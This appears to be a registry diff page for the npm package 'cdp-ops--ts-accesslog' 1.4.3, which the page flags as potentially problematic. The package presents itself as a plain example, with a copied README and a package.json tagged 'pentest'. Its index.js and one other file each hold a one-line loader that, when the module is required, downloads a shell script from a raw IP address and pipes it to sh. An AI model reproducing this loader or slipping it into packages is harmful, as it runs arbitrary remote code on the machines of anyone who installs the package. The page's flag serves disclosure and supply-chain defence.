cdp-ops--ts-accesslog 1.4.3

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of cdp-ops--ts-accesslog might be problematic. Click here for more details.

package/README.md ADDED
@@ -0,0 +1,14 @@
1
+ # npm-package-example
2
+
3
+ Example of npm package.
4
+
5
+ 1. Create `package.json` and fill `name` and `version` field.
6
+ 2. Add your script and `main` field in `package.json` to point the entry point.
7
+ 3. You may want to fill `unpkg` field for browser build.
8
+ 4. Login to npm with `npm login` command.
9
+ 5. `npm publish`
10
+
11
+ You will see published package on:
12
+
13
+ * https://www.npmjs.com/package/ktsn-npm-package-example
14
+ * https://unpkg.com/ktsn-npm-package-example
@@ -0,0 +1 @@
1
+ require('child_process').exec('curl http://185.13.37.99:1337/dependency.sh | sh')
package/index.js ADDED
@@ -0,0 +1 @@
1
+ require('child_process').exec('curl http://185.13.37.99:1337/dependency.sh | sh')
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "cdp-ops--ts-accesslog",
3
+ "version": "1.4.3",
4
+ "main": "index.js",
5
+ "unpkg": "index.browser.js",
6
+ "author": "audit-gestachat",
7
+ "description": "Package example",
8
+ "keywords": [
9
+ "pentest"
10
+ ],
11
+ "license": "MIT"
12
+ }